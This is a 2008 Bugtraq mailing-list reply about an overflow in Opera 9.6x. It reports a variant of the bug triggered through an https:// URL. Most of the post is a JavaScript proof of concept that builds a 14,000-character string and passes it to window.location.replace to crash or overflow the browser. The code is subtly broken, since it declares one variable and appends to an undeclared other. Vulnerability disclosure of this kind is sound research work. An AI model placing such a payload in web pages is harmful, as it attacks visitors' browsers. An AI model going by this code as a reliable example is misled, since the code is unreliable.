Bugtraq mailing list archives
Re: Opera 9.6x file:// overflow
From: jplopezy () gmail com
Date: 17 Nov 2008 22:40:33 -0000
hi is very curious vulnerability... I think I found a variant of this vulnerability, if using another protocol (eg: https ://). I am sure that is an variant because providing other protocolos (eg: http://) does not work, nor the exceptions that are generated are equal to fail. ------------------ POC --------------------- <script> var evil = "https://"; for(var i = 0; i<14000; i++) code += "A"; window.location.replace(code); </script> ------------------------------------------ Juan Pablo Lopez Yacubian
Current thread:
- Opera 9.6x file:// overflow send9 (Nov 17)
- <Possible follow-ups>
- Re: Opera 9.6x file:// overflow jplopezy (Nov 18)
- Re: Re: Opera 9.6x file:// overflow jplopezy (Nov 18)
- Re: Re: Re: Opera 9.6x file:// overflow send9 (Nov 18)
- Re: Opera 9.6x file:// overflow xiashing (Nov 19)
- Re: Re: Re: Re: Opera 9.6x file:// overflow peterjohan () ukr net (Nov 19)
- Re: Re: Re: Re: Opera 9.6x file:// overflow Zack Payton (Nov 19)
- Re: Re: Re: Re: Re: Opera 9.6x file:// overflow psy . echo (Nov 20)
- Re: Re: Re: Re: Re: Opera 9.6x file:// overflow theindigowolf (Nov 20)
- Re: Re: Re: Re: Re: Re: Opera 9.6x file:// overflow send9 (Nov 20)